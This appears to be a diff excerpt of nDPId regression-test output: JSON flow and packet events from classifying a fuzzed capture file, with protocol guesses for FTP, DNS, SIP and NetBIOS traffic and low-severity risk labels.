00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
@@ -1360,28 +1360,28 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1120471107427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471107427,"pkt":"ADBUADRWAODtAW69CABFAABIbJIAAIARSuLAqAECwKgBAQsQADUANDd+8jYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00826{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00827{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00826{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00827{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":180000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120470796941,"flow_last_seen":1120471094413,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":10425,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
